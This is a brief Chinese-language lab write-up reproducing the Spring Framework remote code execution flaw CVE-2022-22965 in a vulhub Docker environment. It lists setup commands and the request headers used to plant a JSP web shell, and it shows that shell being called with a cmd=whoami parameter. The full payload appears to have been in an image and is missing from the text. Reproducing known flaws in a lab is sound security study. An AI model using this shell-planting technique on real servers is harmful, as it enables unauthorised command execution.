Spring Framework远程代码执行漏洞(CVE-2022-22965)复现
Spring Framework远程代码执行漏洞(CVE-2022-22965)复现漏洞复现环境搭建使用vulhub的docker环境git clone https://github.com/vulhub/vulhub.gitcd vulhub/spring/CVE-2022-22965docker-compose up -d访问http:127.0.0.1:8080构造请求地址红色部分替换为su
·
Spring Framework远程代码执行漏洞(CVE-2022-22965)复现
漏洞复现
环境搭建
使用vulhub的docker环境
git clone https://github.com/vulhub/vulhub.git
cd vulhub/spring/CVE-2022-22965
docker-compose up -d
访问http:127.0.0.1:8080
构造请求地址
红色部分替换为
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
访问
http://127.0.0.1:8080/tomcatwar.jsp?pwd=j&cmd=whoami
即可执行命令
更多推荐
已为社区贡献2条内容
所有评论(0)